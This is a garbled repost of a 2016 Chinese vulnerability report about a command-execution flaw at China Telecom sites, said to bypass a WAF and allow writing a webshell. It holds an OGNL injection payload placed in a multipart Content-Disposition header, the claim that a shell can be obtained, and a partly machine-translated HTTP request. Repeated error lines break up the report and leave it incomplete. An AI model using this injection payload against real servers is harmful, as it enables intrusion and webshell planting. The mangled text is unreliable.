漏洞标题 中国电信多个分站命令执行漏洞修复不当(绕过waf写webshell) 相关厂商 中国电信 漏洞作者 路人甲 提交时间 2016-05-30 17:44 公开时间 2016-07-16 18:…
Failure when receiving data from the peer
Failure when receiving data from the peer
Content-Disposition: form-data; name='redirect: /${(#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getRealPath('/'))}'
-1
--389b3f46292c4ee795f3f64e37d6f4db--
可以拿到壳
获取/emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1
主机: **。**。**。**: 8080
代理连接:保持活动状态
接受: text/html,application/xhtml + xml,application/xml; q=0.9,image/webp,*/*; q=0.8
升级 - 不安全请求: 1
内容类型: multipart/form-data;边界=389b3f46292c4ee795f3f64e37d6f4db
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10_11_4)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/50.0.2661.86 Safari/537.36
DNT: 1
Failure when receiving data from the peer
Failure when receiving data from the peer
-
发表于 2016-07-17 08:00
- 阅读 ( 502 )
- 分类:黑客技术
